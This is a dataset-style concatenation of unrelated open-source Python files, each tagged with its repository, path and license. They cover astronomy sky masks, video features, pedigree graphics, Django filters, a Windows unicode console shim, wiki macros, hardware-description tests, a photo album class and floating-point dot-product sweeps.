Returns a 2d numpy histogram with (2. * rmax / bin_size) bins per axis
filled with a ring with inner radius rmin and outer radius rmax of 1.,
all other bins are 0..
Parameters
----------
rmin : float
Inner radius of the ring.
rmax : float
Outer radius of the ring.
bin_size : float
Physical size of the bin, same units as rmin, rmax.
Returns
-------
sky_mask : 2d numpy array
Returns a 2d numpy histogram with (2. * rmax / bin_size) bins per axis
filled with a ring with inner radius rmin and outer radius rmax of 1.,
all other bins are 0..
"""
nbins = int(np.ceil(2. * rmax / bin_size))
sky_x = np.ones((nbins, nbins)) * np.linspace(bin_size / 2., 2. * rmax - bin_size / 2., nbins)
sky_y = np.transpose(sky_x)
sky_mask = np.where((np.sqrt((sky_x - rmax) ** 2. + (sky_y - rmax) ** 2.) < rmax) * (np.sqrt((sky_x - rmax) ** 2. + (sky_y - rmax) ** 2.) > rmin), 1., 0.)
return sky_mask
#---------------------------------------------------------------------------
def get_exclusion_region_map(map, rarange, decrange, exreg) :
"""
Creates a map (2d numpy histogram) with all bins inside of exclusion regions set to 0. (others 1.).
Dec is on the 1st axis (x), RA is on the 2nd (y).
Parameters
----------
map : 2d array
rarange : array
decrange : array
exreg : array-type of SkyCircle
"""
xnbins, ynbins = map.shape
xstep, ystep = (decrange[1] - decrange[0]) / float(xnbins), (rarange[1] - rarange[0]) / float(ynbins)
sky_mask = np.ones((xnbins, ynbins))
for x, xval in enumerate(np.linspace(decrange[0] + xstep / 2., decrange[1] - xstep / 2., xnbins)) :
for y, yval in enumerate(np.linspace(rarange[0] + ystep / 2., rarange[1] - ystep / 2., ynbins)) :
for reg in exreg :
if reg.contains(SkyCoord(yval, xval)) :
sky_mask[x, y] = 0.
return sky_mask
#---------------------------------------------------------------------------
def oversample_sky_map(sky, mask, exmap=None) :
"""
Oversamples a 2d numpy histogram with a given mask.
Parameters
----------
sky : 2d array
mask : 2d array
exmap : 2d array
"""
sky = np.copy(sky)
sky_nx, sky_ny = sky.shape[0], sky.shape[1]
mask_nx, mask_ny = mask.shape[0], mask.shape[1]
mask_centerx, mask_centery = (mask_nx - 1) / 2, (mask_ny - 1) / 2
# new oversampled sky plot
sky_overs = np.zeros((sky_nx, sky_ny))
# 2d hist keeping the number of bins used (alpha)
sky_alpha = np.ones((sky_nx, sky_ny))
sky_base = np.ones((sky_nx, sky_ny))
if exmap != None :
sky *= exmap
sky_base *= exmap
scipy.ndimage.convolve(sky, mask, sky_overs, mode='constant')
scipy.ndimage.convolve(sky_base, mask, sky_alpha, mode='constant')
return (sky_overs, sky_alpha)
#===========================================================================
|
mraue/pyfact
|
pyfact/map.py
|
Python
|
bsd-3-clause
| 11,616 | 0.008351 |
"""
pimpy.video.features.surf : enable to compute a video signature
.. module:: surf
:synopsis: Tools for video
:platform: Unix, Mac, Windows
.. moduleauthor:: Sebastien Campion <sebastien.campion@inria.fr>
"""
# pimpy
# Copyright (C) 2010 Sebastien Campion <sebastien.campion@inria.fr>
#
# pimpy is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pimpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pimpy; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
from feature import Feature
import numpy,logging
from pimpy.video.decoder import decoder
class Surf(Feature):
u"""
A SURFs descriptors provided by OpenCV
:param name: sigsize input signature size default 64
:type name: int
"""
log = logging.getLogger('pimpy.video.features.surf')
description = __doc__
def __init__(self,**kwargs):
u"""
compute video signature based on dct descriptor
"""
Feature.__init__(self,**kwargs)
def _callback(self,frame):
k,d = frame.get_feature("surf")
self.avfs["keypoints"].write(k)
self.avfs["vectors"].write(d)
def get(self,video):
"""
return array of [keypoints,descriptors] for each video frame
:rtype: numpy.array
"""
self.avfs = video.hdf5.get_avfeature_set("visual",self.name)
if not self.avfs :
desc_dataset = (("keypoints",6,numpy.float),
("vectors",64,numpy.float))
self.avfs = video.hdf5.create_avfeature_set("visual",
self.name,
desc_dataset)
d = decoder(video)
d.decode_qcif_gray(self._callback)
print self.avfs.keys()
return (self.avfs['keypoints'].read(),
self.avfs['vectors'].read())
|
scampion/pimpy
|
pimpy/video/features/surf.py
|
Python
|
agpl-3.0
| 2,428 | 0.011532 |
#!/usr/bin/python
###############################################################################
# NAME: new_graphics3.py
# VERSION: 2.0.0b15 (18SEPTEMBER2006)
# AUTHOR: John B. Cole, PhD (jcole@aipl.arsusda.gov)
# LICENSE: LGPL
###############################################################################
from PyPedal import pyp_demog
from PyPedal import pyp_graphics
from PyPedal import pyp_jbc
from PyPedal import pyp_newclasses
from PyPedal import pyp_nrm
from PyPedal import pyp_metrics
from PyPedal.pyp_utils import pyp_nice_time
if __name__ == '__main__':
print 'Starting pypedal.py at %s' % (pyp_nice_time())
example = pyp_newclasses.loadPedigree(optionsfile='new_graphics3.ini')
if example.kw['messages'] == 'verbose':
print '[INFO]: Calling pyp_graphics.new_draw_pedigree() at %s' % (pyp_nice_time())
pyp_graphics.new_draw_pedigree(example, gfilename='graphics3', gtitle='graphics3 pedigree', gorient='p')
pyp_jbc.color_pedigree(example,gfilename='graphics3', ghatch='0', \
metric='sons', gtitle='Nodes are colored by number of sons.', \
gprog='dot', gname=1)
|
wintermind/pypedal
|
PyPedal/examples/new_graphics3.py
|
Python
|
gpl-2.0
| 1,123 | 0.007124 |
import django_filters
from django_filters import rest_framework as filters
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy_chapter import SpiritProphecyChapter, SpiritProphecyChapterLanguage
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy import SpiritProphecy
from django_rv_apps.apps.believe_his_prophets.models.language import Language
from django.utils import timezone
class SpiritProphecyChapterLanguageFilter(django_filters.FilterSet):
code_iso = filters.ModelMultipleChoiceFilter(
queryset=Language.objects.all(),
field_name='language__code_iso',
to_field_name='code_iso'
)
start_date = filters.CharFilter(method='filter_date')
class Meta:
model = SpiritProphecyChapterLanguage
fields = ('id' ,'code_iso','start_date')
def filter_date(self, queryset, name, value):
t = timezone.localtime(timezone.now())
return queryset.filter(
spirit_prophecy_chapter__start_date__year = t.year,
spirit_prophecy_chapter__start_date__month = t.month, spirit_prophecy_chapter__start_date__day = t.day,
)
|
davrv93/creed-en-sus-profetas-backend
|
django_rv_apps/apps/believe_his_prophets_api/views/spirit_prophecy_chapter_language/filters.py
|
Python
|
apache-2.0
| 1,155 | 0.013853 |
# -*- coding: utf-8 -*-
"""Stdout, stderr and argv support for unicode."""
##############################################
# Support for unicode in windows cmd.exe
# Posted on Stack Overflow [1], available under CC-BY-SA 3.0 [2]
#
# Question: "Windows cmd encoding change causes Python crash" [3] by Alex [4],
# Answered [5] by David-Sarah Hopwood [6].
#
# [1] https://stackoverflow.com
# [2] https://creativecommons.org/licenses/by-sa/3.0/
# [3] https://stackoverflow.com/questions/878972
# [4] https://stackoverflow.com/users/85185
# [5] https://stackoverflow.com/a/3259271/118671
# [6] https://stackoverflow.com/users/393146
#
################################################
#
# stdin support added by Merlijn van Deen <valhallasw@gmail.com>, March 2012
# Licensed under both CC-BY-SA and the MIT license.
#
################################################
from __future__ import absolute_import, print_function, unicode_literals
from io import UnsupportedOperation
import sys
stdin = sys.stdin
stdout = sys.stdout
stderr = sys.stderr
argv = sys.argv
if sys.version_info[0] > 2:
unicode = str
PY3 = True
else:
PY3 = False
if sys.platform == "win32":
import codecs
from ctypes import WINFUNCTYPE, windll, POINTER
from ctypes import byref, c_int, create_unicode_buffer
from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR
try:
from ctypes.wintypes import LPVOID
except ImportError:
from ctypes import c_void_p as LPVOID
original_stderr = sys.stderr
# If any exception occurs in this code, we'll probably try to print it on stderr,
# which makes for frustrating debugging if stderr is directed to our wrapper.
# So be paranoid about catching errors and reporting them to original_stderr,
# so that we can at least see them.
def _complain(message):
print(isinstance(message, str) and message or repr(message), file=original_stderr)
# Work around <http://bugs.python.org/issue6058>.
codecs.register(lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
# Make Unicode console output work independently of the current code page.
# This also fixes <http://bugs.python.org/issue1602>.
# Credit to Michael Kaplan <http://blogs.msdn.com/b/michkap/archive/2010/04/07/9989346.aspx>
# and TZOmegaTZIOY
# <https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/1432462#1432462>.
try:
# <https://msdn.microsoft.com/en-us/library/ms683231(VS.85).aspx>
# HANDLE WINAPI GetStdHandle(DWORD nStdHandle);
# returns INVALID_HANDLE_VALUE, NULL, or a valid handle
#
# <https://msdn.microsoft.com/en-us/library/aa364960(VS.85).aspx>
# DWORD WINAPI GetFileType(DWORD hFile);
#
# <https://msdn.microsoft.com/en-us/library/ms683167(VS.85).aspx>
# BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode);
GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(("GetStdHandle", windll.kernel32))
STD_INPUT_HANDLE = DWORD(-10)
STD_OUTPUT_HANDLE = DWORD(-11)
STD_ERROR_HANDLE = DWORD(-12)
GetFileType = WINFUNCTYPE(DWORD, DWORD)(("GetFileType", windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = (WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))
(("GetConsoleMode", windll.kernel32)))
INVALID_HANDLE_VALUE = DWORD(-1).value
def not_a_console(handle):
"""Return whether the handle is not to a console."""
if handle == INVALID_HANDLE_VALUE or handle is None:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR or
GetConsoleMode(handle, byref(DWORD())) == 0)
def old_fileno(std_name):
"""Return the fileno or None if that doesn't work."""
# some environments like IDLE don't support the fileno operation
# handle those like std streams which don't have fileno at all
std = getattr(sys, 'std{0}'.format(std_name))
if hasattr(std, 'fileno'):
try:
return std.fileno()
except UnsupportedOperation:
pass
old_stdin_fileno = old_fileno('in')
old_stdout_fileno = old_fileno('out')
old_stderr_fileno = old_fileno('err')
STDIN_FILENO = 0
STDOUT_FILENO = 1
STDERR_FILENO = 2
real_stdin = (old_stdin_fileno == STDIN_FILENO)
real_stdout = (old_stdout_fileno == STDOUT_FILENO)
real_stderr = (old_stderr_fileno == STDERR_FILENO)
if real_stdin:
hStdin = GetStdHandle(STD_INPUT_HANDLE)
if not_a_console(hStdin):
real_stdin = False
if real_stdout:
hStdout = GetStdHandle(STD_OUTPUT_HANDLE)
if not_a_console(hStdout):
real_stdout = False
if real_stderr:
hStderr = GetStdHandle(STD_ERROR_HANDLE)
if not_a_console(hStderr):
real_stderr = False
if real_stdin:
ReadConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPVOID, DWORD, POINTER(DWORD),
LPVOID)(("ReadConsoleW", windll.kernel32))
class UnicodeInput:
"""Unicode terminal input class."""
def __init__(self, hConsole, name, bufsize=1024):
"""Initialize the input stream."""
self._hConsole = hConsole
self.bufsize = bufsize
self.buffer = create_unicode_buffer(bufsize)
self.name = name
self.encoding = 'utf-8'
def readline(self):
"""Read one line from the input."""
maxnum = DWORD(self.bufsize - 1)
numrecv = DWORD(0)
result = ReadConsoleW(self._hConsole, self.buffer, maxnum, byref(numrecv), None)
if not result:
raise Exception("stdin failure")
data = self.buffer.value[:numrecv.value]
if not PY3:
return data.encode(self.encoding)
else:
return data
if real_stdout or real_stderr:
# BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars,
# LPDWORD lpCharsWritten, LPVOID lpReserved);
WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD),
LPVOID)(("WriteConsoleW", windll.kernel32))
class UnicodeOutput:
"""Unicode terminal output class."""
def __init__(self, hConsole, stream, fileno, name):
"""Initialize the output stream."""
self._hConsole = hConsole
self._stream = stream
self._fileno = fileno
self.closed = False
self.softspace = False
self.mode = 'w'
self.encoding = 'utf-8'
self.name = name
self.flush()
def isatty(self):
"""Return whether it's a tty."""
return False
def close(self):
"""Set the stream to be closed."""
# don't really close the handle, that would only cause problems
self.closed = True
def fileno(self):
"""Return the fileno."""
return self._fileno
def flush(self):
"""Flush the stream."""
if self._hConsole is None:
try:
self._stream.flush()
except Exception as e:
_complain("%s.flush: %r from %r"
% (self.name, e, self._stream))
raise
def write(self, text):
"""Write the text to the output."""
try:
if self._hConsole is None:
if isinstance(text, unicode):
text = text.encode('utf-8')
self._stream.write(text)
else:
if not isinstance(text, unicode):
text = bytes(text).decode('utf-8')
remaining = len(text)
while remaining > 0:
n = DWORD(0)
# There is a shorter-than-documented limitation on the
# length of the string passed to WriteConsoleW (see
# <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = WriteConsoleW(self._hConsole, text,
min(remaining, 10000),
byref(n), None)
if retval == 0 or n.value == 0:
raise IOError("WriteConsoleW returned %r, n.value = %r"
% (retval, n.value))
remaining -= n.value
if remaining == 0:
break
text = text[n.value:]
except Exception as e:
_complain("%s.write: %r" % (self.name, e))
raise
def writelines(self, lines):
"""Write a list of lines by using write."""
try:
for line in lines:
self.write(line)
except Exception as e:
_complain("%s.writelines: %r" % (self.name, e))
raise
if real_stdin:
stdin = UnicodeInput(hStdin, name='<Unicode console stdin>')
if real_stdout:
stdout = UnicodeOutput(hStdout, sys.stdout, STDOUT_FILENO,
'<Unicode console stdout>')
else:
stdout = UnicodeOutput(None, sys.stdout, old_stdout_fileno,
'<Unicode redirected stdout>')
if real_stderr:
stderr = UnicodeOutput(hStderr, sys.stderr, STDERR_FILENO,
'<Unicode console stderr>')
else:
stderr = UnicodeOutput(None, sys.stderr, old_stderr_fileno,
'<Unicode redirected stderr>')
except Exception as e:
_complain("exception %r while fixing up sys.stdout and sys.stderr" % (e,))
# While we're at it, let's unmangle the command-line arguments:
# This works around <http://bugs.python.org/issue2128>.
GetCommandLineW = WINFUNCTYPE(LPWSTR)(("GetCommandLineW", windll.kernel32))
CommandLineToArgvW = (WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))
(("CommandLineToArgvW", windll.shell32)))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [argv_unicode[i].encode('utf-8') for i in range(0, argc.value)]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it will
# have been invoked directly. Otherwise, unicode_argv[0] is the Python
# interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b"-") or arg == u"-":
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the module source,
# but never mind
break
if arg == u'-c':
argv[0] = u'-c'
break
if argv == []:
argv = [u'']
|
icyflame/batman
|
pywikibot/userinterfaces/win32_unicode.py
|
Python
|
mit
| 12,438 | 0.001769 |
"""The macros below aren't reliable (e.g., some fail if ``arg_string`` is `None`)
or safe (``include`` doesn't guard against circular reference). For a more complete example, see
`the code used in the sandbox <http://code.google.com/p/urlminer/source/browse/examples/wiki/macros.py>`_.
"""
import genshi.builder as bldr
import dialects, core
import os
class Page(object):
root = 'test_pages'
def __init__(self,page_name):
self.name = page_name
def get_raw_body(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
s = f.read()
f.close()
return s
except IOError:
return None
def exists(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
f.close()
return True
except IOError:
return False
def class_func(page_name):
if not Page(page_name).exists():
return 'nonexistent'
def path_func(page_name):
if page_name == 'Home':
return 'FrontPage'
else:
return page_name
## Start of macros
def include(arg_string,body,isblock):
page = Page(arg_string.strip())
return text2html.generate(page.get_raw_body())
def include_raw(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(page.get_raw_body(),class_='plain')
def include_source(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(text2html.render(page.get_raw_body()))
def source(arg_string,body,isblock):
return bldr.tag.pre(text2html.render(body))
def pre(arg_string,body,isblock):
return bldr.tag.pre(body)
## End of macros
macros = {'include':include,
'include-raw':include_raw,
'include-source':include_source,
'source':source,
'pre':pre
}
def macro_dispatcher(macro_name,arg_string,body,isblock,environ):
if macro_name in macros:
return macros[macro_name](arg_string,body,isblock)
dialect = dialects.create_dialect(dialects.creole11_base,
wiki_links_base_url='',
wiki_links_space_char='',
# use_additions=True,
no_wiki_monospace=False,
wiki_links_class_func=class_func,
wiki_links_path_func=path_func,
macro_func=macro_dispatcher)
text2html = core.Parser(dialect)
if __name__ == '__main__':
text = Page('CheatSheetPlus').get_raw_body()
f = open(os.path.join('test_pages','CheatSheetPlus.html'),'r')
rendered = f.read()
f.close()
f = open(os.path.join('test_pages','template.html'),'r')
template = f.read()
f.close()
out = open(os.path.join('test_pages','out.html'),'w')
out.write(template % text2html(text))
out.close()
assert template % text2html(text) == rendered
|
hprid/creoleparser
|
creoleparser/test_cheat_sheet_plus.py
|
Python
|
mit
| 2,923 | 0.021895 |
import unittest
from hwt.code import If, Switch
from hwt.synthesizer.rtlLevel.netlist import RtlNetlist
class AstNodeIoReplacingTC(unittest.TestCase):
def sigs_by_n(self, n):
nl = RtlNetlist()
sigs = [nl.sig(chr(ord("a") + i)) for i in range(n)]
for s in sigs:
s.hidden = False
return nl, sigs
def test_If_simple_replace_input(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
b(1)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = If(c,
b(1)
).Else(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [])
self.assertEqual(c.endpoints, [stm, stm_ref])
def test_If_elif_replace_input(self):
_, (a, b, c, d) = self.sigs_by_n(4)
stm = \
If(a,
b(1)
).Elif(c & a,
b(0)
).Else(
c(0)
)
stm._replace_input(a, d)
stm_ref = If(d,
b(1)
).Elif(c & d,
b(0)
).Else(
c(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [a._isOn().singleDriver()])
self.assertEqual(c.endpoints, [(c & a).singleDriver(),
(c & d).singleDriver()])
def test_If_nested(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
If(c,
b(c & a)
).Else(
b(c | a)
)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
If(c,
If(c,
b(c)
).Else(
b(c)
)
).Else(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
def test_Switch_simple(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
Switch(a)\
.Case(0,
b(1)
).Default(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
Switch(c)\
.Case(0,
b(1)
).Default(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
if __name__ == '__main__':
import sys
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AstNodeIoReplacingTC))
# suite.addTest(AstNodeIoReplacingTC("test_If_elif_replace_input"))
runner = unittest.TextTestRunner(verbosity=3)
sys.exit(not runner.run(suite).wasSuccessful())
|
Nic30/hwtLib
|
hwtLib/tests/synthesizer/astNodeIoReplacing_test.py
|
Python
|
mit
| 2,912 | 0.008242 |
from PIL import Image
import os.path,os
#import pickle
#import sqlite3
import hashlib
import time
import random
import logging
import copy
import threading
import itertools
from math import ceil
from enum import Enum
from copy import deepcopy
import itertools
from lipyc.utility import recursion_protect
from lipyc.Version import Versionned
from lipyc.config import *
from lipyc.utility import check_ext, make_thumbnail
from tkinter import messagebox
class Album(Versionned): #subalbums not fully implemented
def __init__(self, id, scheduler, name=None, datetime=None):
super().__init__()
self.scheduler = scheduler
self.id = id
self.name = name
self.datetime = datetime if datetime else time.mktime(time.gmtime())
self.subalbums = set()
self.thumbnail = None
self.files = set() #order by id
self.inner_keys = [] #use for inner albums
def __deepcopy__(self, memo):
new = Album(self.id, self.scheduler, self.name, self.datetime)
new.subalbums = deepcopy(self.subalbums)
new.thumbnail = deepcopy(self.thumbnail)
new.files = deepcopy(self.files)
new.inner_keys = deepcopy(self.inner_keys)
return new
#for copy_to,add_to,move_to
def clone(self, new_id):
alb = self.__deepcopy__(None)
alb.inner_keys.clear()
alb.id = new_id
return alb
def pseudo_clone(self):
new = Album(self.id, self.scheduler, self.name, self.datetime)
if self.thumbnail:
self.scheduler.duplicate(self.thumbnail)
new.subalbums = self.subalbums
new.thumbnail = self.thumbnail
new.files = self.files
return new
def sql(self):
return (self.id, self.name, self.datetime,
'|'.join( [ str(alb.id) for alb in self.subalbums] ), self.thumbnail,
'|'.join( [ str(afile.id) for afile in self.files] ),
'|'.join(self.inner_keys) )
def rename(self, name):
self.name = name
def add_file(self, _file):
self.files.add(_file)
if self.thumbnail == None and _file.thumbnail :
self.thumbnail = self.scheduler.duplicate_file( _file.thumbnail )
def remove_file(self, _file):
self.files.discard(_file)
@recursion_protect()
def remove_all(self):
for album in list(self.subalbums):
album.remove_all()
self.subalbums.clear()
for _file in list(self.files):
self.remove_file(_file)
self.files.clear()
def add_subalbum(self, album):
self.subalbums.add( album )
def remove_subalbum(self, album):
if album in self.subalbums:
if album.thumbnail :
self.scheduler.remove_file( album.thumbnail )
self.subalbums.discard( album )
@recursion_protect()
def export_to(self, path):
location = os.path.join(path, self.name)
if not os.path.isdir(location):
os.makedirs( location )
for _file in self.files:
_file.export_to(location)
for album in self.subalbums:
album.export_to( location )
@recursion_protect()
def lock_files(self):
for _file in self.files:
_file.io_lock.acquire()
for album in self.subalbums:
album.lock_files()
def set_thumbnail(self, location):
if self.thumbnail :
self.scheduler.remove_file(self.thumbnail)
if not isinstance(location, str) or check_ext(location, img_exts): #fichier ouvert
self.thumbnail = make_thumbnail(self.scheduler, location )
else:
self.thumbnail = self.scheduler.add_file(location_album_default) #size and md5 ought to be combute once for all
def deep_files(self):
tmp = itertools.chain.from_iterable(map(Album.deep_files, self.subalbums))
return itertools.chain( self.files, tmp)
@recursion_protect(0)
def __len__(self): #number of file in dir and subdir
return len(self.files) + sum( [len(a) for a in self.subalbums ] )
@recursion_protect(0)
def all_albums(self):
return itertools.chain( [self], *list(map( lambda x:x.all_albums(), self.subalbums )) )
@recursion_protect(0)
def all_files(self):
return set(itertools.chain( *list(map(lambda x:x.files, self.all_albums()))))
@recursion_protect(0)
def duplicate(self):
if self.thumbnail:
self.scheduler.duplicate_file(self.thumbnail)
for f in self.files:
f.duplicate()
for alb in self.subalbums:
alb.duplicate()
|
severus21/LiPyc
|
src/Album.py
|
Python
|
apache-2.0
| 4,909 | 0.020371 |
import math
import random
import operator
import traceback
from .titanic import ndarray
from .fpbench import fpcparser
from .arithmetic import mpmf, ieee754, posit, fixed, evalctx, analysis
from .arithmetic.mpmf import Interpreter
from .sweep import search
from .sweep.utils import *
dotprod_naive_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (+ accum
(! {mul_prec} (* (ref A i) (ref B i)))))])
(cast accum)))
'''
dotprod_fused_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
(cast accum)))
'''
dotprod_fused_unrounded_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
accum))
'''
binsum_template = '''(FPCore addpairs ((A n))
:pre (> n 1)
(tensor ([i (# (/ (+ n 1) 2))])
(let* ([k1 (# (* i 2))]
[k2 (# (+ k1 1))])
(if (< k2 n)
(! {sum_prec} (+ (ref A k1) (ref A k2)))
(ref A k1)))
))
(FPCore binsum ((A n))
(while (> (size B 0) 1)
([B A (addpairs B)])
(if (== (size B 0) 0) 0 (ref B 0))))
'''
nksum_template = '''(FPCore nksum ((A n))
:name "Neumaier's improved Kahan Summation algorithm"
{sum_prec}
(for* ([i n])
([elt 0 (ref A i)]
[t 0 (+ accum elt)]
[c 0 (if (>= (fabs accum) (fabs elt))
(+ c (+ (- accum t) elt))
(+ c (+ (- elt t) accum)))]
[accum 0 t])
(+ accum c)))
'''
vec_prod_template = '''(FPCore vec-prod ((A n) (B m))
:pre (== n m)
(tensor ([i n])
(! {mul_prec} (* (ref A i) (ref B i)))))
'''
dotprod_bin_template = (
binsum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (binsum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
dotprod_neumaier_template = (
nksum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (nksum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
def mk_dotprod(template, overall_prec, mul_prec, sum_prec):
return template.format(overall_prec=overall_prec,
mul_prec=mul_prec,
sum_prec=sum_prec)
def largest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(ctx.fbound, ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emax, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def smallest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(m=1, exp=ctx.n + 1, ctx=ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emin, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_mul_ctx(ctx):
if isinstance(ctx, evalctx.IEEECtx):
safe_es = ctx.es + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
elif isinstance(ctx, evalctx.PositCtx):
# very conservative; not a posit ctx
log_emax = ctx.emax.bit_length()
safe_es = log_emax + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_quire_ctx(ctx, log_carries = 30):
mul_ctx = safe_mul_ctx(ctx)
largest = largest_representable(ctx)
largest_squared = largest.mul(largest, ctx=mul_ctx)
smallest = smallest_representable(ctx)
smallest_squared = smallest.mul(smallest, ctx=mul_ctx)
# check
assert largest_squared.inexact is False and smallest_squared.inexact is False
left = largest_squared.e + 1 + log_carries
right = smallest_squared.e
quire_type = fixed.fixed_ctx(right, left - right)
# check
assert not fixed.Fixed._round_to_context(largest_squared, ctx=quire_type).isinf
assert not fixed.Fixed._round_to_context(smallest_squared, ctx=quire_type).is_zero()
return quire_type
def round_vec(v, ctx):
return ndarray.NDArray([mpmf.MPMF(x, ctx=ctx) for x in v])
def rand_vec(n, ctx=None, signed=True):
if signed:
v = [random.random() if random.randint(0,1) else -random.random() for _ in range(n)]
else:
v = [random.random() for _ in range(n)]
if ctx is None:
return v
else:
return round_vec(v, ctx)
def setup_dotprod(template, precs):
evaltor = Interpreter()
main = load_cores(evaltor, mk_dotprod(template, *precs))
return evaltor, main
def setup_full_quire(ctx, unrounded=False):
qctx = safe_quire_ctx(ctx)
precs = (ctx.propstr(), '', qctx.propstr())
if unrounded:
template = dotprod_fused_unrounded_template
else:
template = dotprod_fused_template
return setup_dotprod(template, precs)
# sweep
# constants: base dtype
# # trials (input data...)
# variables: quire high bits
# quire lo bits
# metrics: ulps
# BAD - globals
class VecSettings(object):
def __init__(self):
self.trials = None
self.n = None
self.As = None
self.Bs = None
self.refs = None
self.template = None
self.overall_ctx = None
self.mul_ctx = None
def cfg(self, trials, n, ctx, template, signed=True):
self.trials = trials
self.n = n
self.As = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
self.Bs = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
evaltor, main = setup_full_quire(ctx)
self.refs = [evaltor.interpret(main, [a, b]) for a, b in zip(self.As, self.Bs)]
self.template = template
self.overall_ctx = ctx
self.mul_ctx = safe_mul_ctx(ctx)
print(mk_dotprod(template, self.overall_ctx.propstr(), self.mul_ctx.propstr(), safe_quire_ctx(ctx).propstr()))
global_settings = VecSettings()
def describe_stage(quire_lo, quire_hi):
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
print(mk_dotprod(global_settings.template, *precs))
def vec_stage(quire_lo, quire_hi):
try:
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
evaltor, main = setup_dotprod(global_settings.template, precs)
worst_ulps = 0
sum_ulps = 0
infs = 0
for a, b, ref in zip(global_settings.As, global_settings.Bs, global_settings.refs):
result = evaltor.interpret(main, [a, b])
if result.is_finite_real():
ulps = abs(linear_ulps(result, ref))
sum_ulps += ulps
if ulps > worst_ulps:
worst_ulps = ulps
else:
worst_ulps = math.inf
sum_ulps = math.inf
infs += 1
avg_ulps = sum_ulps / global_settings.trials
return quire_lo + quire_hi, infs, worst_ulps, avg_ulps
except Exception:
traceback.print_exc()
